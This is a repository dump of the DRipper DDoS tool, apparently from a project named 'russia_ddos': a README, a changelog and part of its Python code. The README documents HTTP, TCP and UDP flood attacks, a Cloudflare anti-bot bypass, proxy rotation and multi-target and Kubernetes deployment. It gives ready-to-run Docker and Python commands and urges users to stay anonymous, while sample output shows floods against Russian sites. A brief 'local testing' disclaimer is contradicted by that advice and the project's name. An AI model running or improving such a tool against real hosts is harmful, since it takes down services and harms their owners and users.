README.md
# DRipper

[![Build status][actions build badge]][actions build link]
[![Docker Pulls][docker pulls badge]][docker pulls link]
[![Docker Image Version (latest semver)][dockerhub badge]][dockerhub link]
[![License: MIT][license badge]][license link]

DESCRIPTION
-----------

This is reworked version of [DRipper](https://gist.github.com/scamp/33807688d0ebdcfbd4c29a4b992a8b54).
This script support HTTP/TCP/UDP flood attack. We recommend using this script for your own test purposes in the local (on-premise) environment to improve your own web services against DDoS attacks.

## Prerequisites

- Python 3.9 or higher
- Docker (optional) if you'd like to run script with docker

## Features

### Attacks

- HTTP Flood - OSI Layer 7 method volumetric attack type
- HTTP Bypass - OSI Layer 7 method volumetric attack type with to bypass Cloudflare's anti-bot page (also known as "I'm Under Attack Mode", or IUAM)
- TCP Flood - OSI Layer 4 method volumetric attack type
- UDP Flood - OSI Layer 4 method volumetric attack type

### Other features

- Multiple targets support - the script can attack multiple targets at the same time
- Detailed statistics with deep attack log for better attack analysis during the attack
- Display average request rate and throughput
- Periodic checks of your public IP address to ensure your privacy and VPN connection survivability.
- Automatic and periodic checks for the availability of the attacked host
- Distributed statistics of the response code for the attacked host, which helps you to understand the effectiveness of attacks
- Detection of redirects and rate limits with alerts in the event log

## How it looks

```bash
───────────────────────────────────────── Starting DRipper ─────────────────────────────────────────
[23:17:39] (1/3) tcp://www.site1.ru:80/ (192.168.0.101:80) Trying to connect...      services.py:135
           (1/3) tcp://www.site1.ru:80/ (192.168.0.101:80) Connected                 services.py:138
           (1/3) https://www.site2.ru:443/ (192.168.0.102:443) Trying to connect...  services.py:135
           (1/3) https://www.site2.ru:443/ (192.168.0.102:443) Connected             services.py:138
────────────────────────────────────────────────────────────────────────────────────────────────────


                        ██████╗ ██████═╗██╗██████╗ ██████╗ ███████╗██████═╗
                        ██╔══██╗██╔══██║██║██╔══██╗██╔══██╗██╔════╝██╔══██║
                        ██║  ██║██████╔╝██║██████╔╝██████╔╝█████╗  ██████╔╝
                        ██║  ██║██╔══██╗██║██╔═══╝ ██╔═══╝ ██╔══╝  ██╔══██╗
                        ██████╔╝██║  ██║██║██║     ██║     ███████╗██║  ██║
                        ╚═════╝ ╚═╝  ╚═╝╚═╝╚═╝     ╚═╝     ╚══════╝╚═╝  ╚═╝
                                                                    v2.6.1

                  It is the end user's responsibility to obey all applicable laws.
                  It is just like a server testing script and Your IP is visible.
                                Please, make sure you are ANONYMOUS!

                             https://github.com/alexmon1989/russia_ddos


 ──────────────────────────────────────────────────────────────────────────────────────────────────
  Description                                 Status
 ──────────────────────────────────────────────────────────────────────────────────────────────────
  Start Time, Duration                        2022-04-08 23:17:29  (0:00:14)
  Your Country, Public IP                     DK   45.***.***.***
  Total Threads                               200
  vCPU Count                                  8
  Socket Timeout (seconds)                    1
 ──────────────────────────────────────────────────────────────────────────────────────────────────
  Target (tcp://www.site1.ru:80/)             1/2 (next in 1)
 ──────────────────────────────────────────────────────────────────────────────────────────────────
  Country, Host IP                            RU  192.168.0.101:80 (target-0)
  Attack Method                               TCP-FLOOD
  Random Packet Length (bytes)                From 1 to 1024
  Threads                                     100
  CloudFlare Protection                       Not protected
  Availability (check-host.net)               ...detecting (TCP method)
  Sent Bytes @ AVG speed                      1.73 MB @ 119.76 kB/s
  Sent Packets @ AVG speed                      3,531 @ 238 packets/s
  Connections                                 success: 100, failed: 0, success rate: 100 %
 ──────────────────────────────────────────────────────────────────────────────────────────────────

  Events Log
 ──────────────────────────────────────────────────────────────────────────────────────────────────
  [23:17:40]   info   target-0  thread-14   Creating new TCP connection...
  [23:17:40]   info   target-0  thread-114  Creating new TCP connection...
  [23:17:40]   info   target-0  thread-16   Creating new TCP connection...
  [23:17:40]   info   target-0  thread-20   Creating new TCP connection...
  [23:17:40]   info   target-0  thread-22   Creating new TCP connection...

                                 Press CTRL+C to interrupt process.

                                         #StandWithUkraine
```

## Usage

DRipper can run on Windows/Linux/macOS from command line.
We recommend to use `PowerShell` for Windows users to run the script, Linux/macOS users can use any shell.

Run `dripper --help` to see detailed params description.

```bash
Usage: DRipper.py [options] arg

Options:
  --version                                             show program's version number and exit
  -h, --help                                            show this help message and exit
  -s TARGETS, --targets=TARGETS                         Attack target in {scheme}://{hostname}[:{port}][{path}] format.
                                                        Multiple targets allowed.
  -m ATTACK_METHOD, --method=ATTACK_METHOD              Attack method: udp-flood, tcp-flood, http-flood, http-bypass
  -e HTTP_METHOD, --http-method=HTTP_METHOD             HTTP method. Default: GET
  -t THREADS_COUNT, --threads=THREADS_COUNT             Total threads count. Default: 100
  --min-random-packet-len=MIN_RANDOM_PACKET_LEN
                                                        Min random packets length. Default: 1 for udp/tcp
  -l MAX_RANDOM_PACKET_LEN, --max-random_packet-len=MAX_RANDOM_PACKET_LEN
                                                        Max random packets length. Default: 1024 for udp/tcp
  -y PROXY_LIST, --proxy-list=PROXY_LIST                File (fs or http/https) with proxies in
                                                        ip:port:username:password line format. Proxies will be ignored
                                                        in udp attack!
  -k PROXY_TYPE, --proxy-type=PROXY_TYPE                Type of proxy to work with. Supported types: socks5, socks4,
                                                        http. Default: socks5
  -c HEALTH_CHECK, --health-check=HEALTH_CHECK          Controls health check availability. Turn on: 1, turn off: 0.
                                                        Default: 1
  -o SOCKET_TIMEOUT, --socket-timeout=SOCKET_TIMEOUT    Timeout for socket connection is seconds. Default (seconds): 1
                                                        without proxy, 2 with proxy                                                    
  --dry-run                                             Print formatted output without full script running.
  --log-size=LOG_SIZE                                   Set the Events Log history frame length.
  --log-level=EVENT_LEVEL                               Log level for events board. Supported levels: info, warn, error,
                                                        none.
  -d DURATION_SECONDS, --duration=DURATION_SECONDS      Attack duration in seconds. After this duration script will 
                                                        stop its execution.
  -q, --quiet                                           Do not print messages to stdout.

Example: dripper -t 100 -m tcp-flood -s tcp://192.168.0.1:80
```

## How to Run

#### Using Docker

```bash
# HTTP flood
docker run -it --rm alexmon1989/dripper:latest -t 100 -m http-flood -s http://127.0.0.1:80 
# or
docker run -it --rm alexmon1989/dripper:latest -t 100 -s http://127.0.0.1:80
# or even
docker run -it --rm alexmon1989/dripper:latest -s http://127.0.0.1

# TCP flood
docker run -it --rm alexmon1989/dripper:latest -t 100 -l 2048 -s tcp://127.0.0.1:80 

# UDP flood
docker run -it --rm alexmon1989/dripper:latest -t 100 -l 2048 -s udp://127.0.0.1:80 
```

#### Directly with Python.

Ensure you have Python 3.9 or better installed. Then clone this repo and run DRipper.py with params you need

```bash
git clone https://github.com/alexmon1989/russia_ddos.git
cd russia_ddos

# Install dependencies
python3 -m pip install --upgrade pip git+https://github.com/alexmon1989/russia_ddos.git
# Run script
dripper -t 100 -s udp://127.0.0.1:80


# ===== Alternative variant =====

# Install python dependencies:
pip install -r requirements.txt
# Run script
python3 DRipper.py -t 100 -s udp://127.0.0.1:80
```

#### Kubernetes

You can deploy and run DRipper in Kubernetes cluster using [kube-dripper][kube-dripper-link] terraform configuration.
For details - see the [README][kube-dripper-readme] from **kube-dripper** project.

## How to run unit tests

#### Prepare
```bash
pip install -r requirements.test.txt
```

#### Run
```bash
pytest

# with code coverage report:
pytest --cov-report=html:./htmlcov
```

## Benchmark

#### Prepare
- Install [Node.js](https://nodejs.org/en/download/)
- Install [ddbenchmarker](https://github.com/knyga/ddos-attack-benchmarker)
```bash
npm i -g ddbenchmarker
```
- Install test requirements (same as in unit testing)
```bash
pip install -r requirements.test.txt
```

#### Run
```bash
pytest -c pytest.benchmark.ini
```

# License

This project is distributed under the MIT License, see [LICENSE](./LICENSE) for more information.

<!-- External links -->
[actions build badge]: https://github.com/alexmon1989/russia_ddos/actions/workflows/build.yml/badge.svg
[actions build link]:  https://github.com/alexmon1989/russia_ddos/actions/workflows/build.yml

[docker pulls link]:   https://hub.docker.com/r/alexmon1989/dripper
[docker pulls badge]:  https://img.shields.io/docker/pulls/alexmon1989/dripper
[dockerhub link]:      https://hub.docker.com/r/alexmon1989/dripper/tags
[dockerhub badge]:     https://img.shields.io/docker/v/alexmon1989/dripper?label=DockerHub

[kube-dripper-link]:   https://github.com/denismakogon/kube-dripper
[kube-dripper-readme]: https://github.com/denismakogon/kube-dripper/blob/main/README.md

[license badge]:       https://img.shields.io/badge/License-MIT-yellow.svg
[license link]:        ./LICENSE


CHANGELOG.md
# Change Log
All notable changes to this project will be documented in this file.

The format based on [Keep a Changelog](https://keepachangelog.com)
and this project adheres to [Semantic Versioning](https://semver.org).

## [Unreleased](https://github.com/alexmon1989/russia_ddos/compare/2.6.3...HEAD)


## [v2.6.3](https://github.com/alexmon1989/russia_ddos/compare/2.6.2...2.6.3)

## Changed
- Moved initial checks to attacks to speedup script start

### Fixed
- Fixed error with Request lib import


## [v2.6.2](https://github.com/alexmon1989/russia_ddos/compare/2.6.1...2.6.2)

### Fixed
- Fixed error with encoding for external resources (targets list)


## [v2.6.1](https://github.com/alexmon1989/russia_ddos/compare/2.6.0...2.6.1)

### Fixed
- Fixed timeouts
- Fixed script start logic

## [v2.6.0](https://github.com/alexmon1989/russia_ddos/compare/2.5.0...2.6.0)

### Added
- Attack duration param (in seconds). After this duration script will stop its execution.
- User guide and setup guide
- Threads count autoscaling. `-t` argument (same as `--threads-count`) now supports **auto**. The auto-scaling method is the default.
- Check minimal required python version
- Attack duration controller. `-d` argument (same as `--duration`) set the attack duration in seconds. After this duration script will stop its execution.
- Targets list support. `--targets-list` argument allows you to use list with targets. List with targets can be path to file or hyperlink.

### Changed
- Random bytes optimization (performance improvement)
- Changed CLI arguments for package size management
- Improved speed for new version check
- Improved text messages for better user experience

### Fixed
- Fixed command parameter generator to help users with incorrect command line parameters or errors with parameters
- Test UDP connection for UDP scheme if TCP did not work


## [v2.5.0](https://github.com/alexmon1989/russia_ddos/compare/2.4.0...2.5.0)

### Added
- Check DRipper updates from GitHub tags and show notification to user about it.
- Added check for anti-DDoS page protection for check-host.net service.
- Script command parameter generator to help users with incorrect command line parameters or errors with parameters

### Changed
- Changed multiple target argument pass. Targets should be passed separately with `-s` flag.
- Moved target specific validation from statistic and context to Target class
- Targets manager can allocate attacks after target is removed and encapsulates logic related to the targets collection management.


## [v2.4.0](https://github.com/alexmon1989/russia_ddos/compare/2.3.1...2.4.0)

### Added
- Added support for multiple targets. Multiple target should be passed as sting with ',' as delimiter
- Threads are distributed uniformly between targets.
- Irresponsive targets and their threads die in runtime.
- Added support for the log-level argument.

### Changed
- Target-related stats are represented on pages. Pages are rotated automatically in 5 seconds intervals.
- Refactored stats representation. Isolated target-related details builder.
- Isolated time interval manager.
- Improved error messages and description about error when validates input arguments.

### Fixed
- Fixed CloudFlare detection logic.


## [v2.3.1](https://github.com/alexmon1989/russia_ddos/compare/2.3.0...2.3.1)

### Fixed
- Fixed setup script and Docker builds


## [v2.3.0](https://github.com/alexmon1989/russia_ddos/compare/2.2.0...2.3.0)

### Added
- `dry run` mode for fast testing purposes
- CloudFlare bypass mode for HTTP flood method
- Events log that helps to understand attack process details in depth
- `--log-size` parameter to configure Events log history frame length

### Fixed
- Fixed error with keyboard interrupting and threads shutdown process
- Reduced IP address re-checks to avoid redundant API calls
- Attack checks methods, improved speed
- Rendering table with statistic does not re-render table caption with logo

### Changed
- Isolated target. The target contains a full server description, statistics, and health check. It is an intermediate step towards multiple targets.
- Formalized attack_method, added names and labels for attacks.
- Isolated assets.
- Split context on components.
- Changed health check to be target-dependant.
- Reduced awareness about the entire context structure.
- Unified tests format. Classes should represent "Describe" blocks, and test methods should start with "it."
- Changed Exception handling and logging process.
- Replaced Error class with Events


## [v2.2.0](https://github.com/alexmon1989/russia_ddos/compare/2.1.0...2.2.0)

### Added
- Command line Option `--version` to get the current version of script
- Added support for HTTP and SOCKS4 proxy.
- Added the possibility to read proxies from HTTP/HTTPS location. It helps to organize multiple peers.

### Changed
- UDP/TCP/HTTP attack methods internals
- HTTP Status code check method now support periodical check
- Improved performance for HTTP flood


## [v2.1.0](https://github.com/alexmon1989/russia_ddos/compare/2.0.4...2.1.0)


### Added
- Added support for SOCKS5 proxies. (HTTP/TCP only)
- Added possibility to dismiss health check. It is helpful during development.
- Added the possibility to attack random extra_data for HTTP attack (turned off by default).
- Added build tools to create `dripper` executable for Windows/Linux/macOS

### Fixed
- Fixed proxy list params read

### Changed
- Reworked Error log for Statistic


## [v2.0.4](https://github.com/alexmon1989/russia_ddos/compare/2.0.3...2.0.4)

### Changed
- Moved options parser to separate module
- Simplified health check logic
- Improved script start time


## [v2.0.3](https://github.com/alexmon1989/russia_ddos/compare/2.0.3...2.0.3)

### Fixed
- Fixed vertical scrolling issue
- Fixed live refresh for Statistic


## [v2.0.2](https://github.com/alexmon1989/russia_ddos/compare/2.0.1...2.0.2)

### Fixed

common.py
import http.client
import ipaddress
import socket
import string
import random
import math
import os
import subprocess
import json
import sys
import urllib.request
from functools import lru_cache
from colorama import Fore

from constants import (GETTING_SERVER_IP_ERROR_MSG, NO_SUCCESSFUL_CONNECTIONS_ERROR_MSG, DEFAULT_CURRENT_IP_VALUE,
                       VERSION)


@lru_cache(maxsize=None)
def get_server_ip_error_msg() -> str:
    return Fore.RED + GETTING_SERVER_IP_ERROR_MSG + Fore.RESET


@lru_cache(maxsize=None)
def get_no_successful_connection_error_msg() -> str:
    return Fore.RED + NO_SUCCESSFUL_CONNECTIONS_ERROR_MSG + Fore.RESET


def readfile(filename: str):
    """Read string from file"""
    with open(filename, 'r') as file:
        return file.readlines()


def get_random_string(len_from, len_to):
    """Random string with different length"""
    length = random.randint(len_from, len_to)
    letters = string.ascii_lowercase
    result_str = ''.join(random.choice(letters) for i in range(length))

    return result_str


def get_random_port():
    ports = [22, 53, 80, 443]
    return random.choice(ports)


def get_first_ip_part(ip: str) -> str:
    parts = ip.split('.')
    if len(parts) > 1:
        return f'{parts[0]}.*.*.*'
    else:
        return parts[0]


def get_current_ip():
    """Gets user IP."""
    current_ip = DEFAULT_CURRENT_IP_VALUE
    try:
        current_ip = urllib.request.urlopen('https://ident.me').read().decode('utf8')
    except:
        pass

    return current_ip


def get_host_country(host_ip):
    """Gets country of the target's IP"""
    country = 'NOT DEFINED'
    try:
        response_body = urllib.request.urlopen(f'https://ipinfo.io/{host_ip}').read().decode('utf8')
        response_data = json.loads(response_body)
        country = response_data['country']
    except:
        pass

    return country


def __isCloudFlareProtected(link: str, user_agents: list) -> bool:
    """Check if the site is under CloudFlare protection."""

    parsed_uri = urllib.request.urlparse(link)
    domain = "{uri.netloc}".format(uri=parsed_uri)
    try:
        origin = socket.gethostbyname(domain)
        conn = http.client.HTTPSConnection('www.cloudflare.com')
        headers = {
            'Cookie': '__cf_bm=OnRKNQTGoxsvaPnhUpTwRi4UGosW61HHYDZ0KratigY-1646567348-0-AXoOT+WpLyPZuVwGPE2Zb1FxFR2oB18wPkJE1UUXfAEbJDKtsZB0X3O8ED29koUfldx63GwHg/sm4TtEkk4hBL3ET83DUUTWCKrb6Z0ZSlcP',
            'User-Agent': str(random.choice(user_agents)).strip('\n')
        }
        conn.request('GET', '/ips-v4', '', headers)
        iprange = conn.getresponse().read().decode('utf-8')
        ipv4 = [row.rstrip() for row in iprange.splitlines()]
        for i in range(len(ipv4)):
            if ipaddress.ip_address(origin) in ipaddress.ip_network(ipv4[i]):
                return True
    except:
        return False

    return False


def convert_size(size_bytes: int) -> str:
    """Converts size in bytes to human format."""
    if size_bytes == 0:
        return '0B'
    size_name = ('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB')
    i = int(math.floor(math.log(size_bytes, 1024)))
    p = math.pow(1024, i)
    s = round(size_bytes / p, 2)
    return '%s %s' % (s, size_name[i])


def get_cpu_load():
    if os.name == 'nt':
        pipe = subprocess.Popen('wmic cpu get loadpercentage', stdout=subprocess.PIPE)
        out = pipe.communicate()[0].decode('utf-8')
        out = out.replace('LoadPercentage', '').strip()
        return f'{out}%'
    else:
        load1, load5, load15 = os.getloadavg()
        cpu_usage = (load15 / os.cpu_count()) * 100
        return f"{cpu_usage:.2f}%"


def print_logo():
    print(Fore.CYAN + f'''

██████╗ ██████╗ ██╗██████╗ ██████╗ ███████╗██████╗
██╔══██╗██╔══██╗██║██╔══██╗██╔══██╗██╔════╝██╔══██╗
██║  ██║██████╔╝██║██████╔╝██████╔╝█████╗  ██████╔╝ {Fore.YELLOW + ''}
██║  ██║██╔══██╗██║██╔═══╝ ██╔═══╝ ██╔══╝  ██╔══██╗
██████╔╝██║  ██║██║██║     ██║     ███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝╚═╝     ╚═╝     ╚══════╝╚═╝  ╚═╝
                                            {Fore.GREEN + VERSION + Fore.RESET}

It is the end user's responsibility to obey all applicable laws.
It is just like a server testing script and Your IP is visible.

Please, make sure you are ANONYMOUS!
    ''')


###############################################
# Input parser, Logo, Help messages
###############################################


def print_usage(parser):
    """Wrapper for Logo with help."""
    print_logo()
    parser.print_help()
    sys.exit()


def parse_args(parser):
    """Initialize command line arguments parser and parse CLI arguments."""
    parser_add_options(parser)
    return parser.parse_args()


def parser_add_options(parser):
    """Add options to a parser."""
    parser.add_option('-p', '--port',
                      dest='port', type='int', default=80,
                      help='port (default: 80)')
    parser.add_option('-t', '--threads',
                      dest='threads', type='int', default=100,
                      help='threads (default: 100)')
    parser.add_option('-r', '--random_len',
                      dest='random_packet_len', type='int', default=1,
                      help='Send random packets with random length (default: 1')
    parser.add_option('-l', '--max_random_packet_len',
                      dest='max_random_packet_len', type='int', default=48,
                      help='Max random packets length (default: 48)')
    parser.add_option('-m', '--method',
                      dest='attack_method', type='str', default='udp',
                      help='Attack method: udp (default), http')
    parser.add_option('-s', '--server',
                      dest='host',
                      help='Attack to server IP')
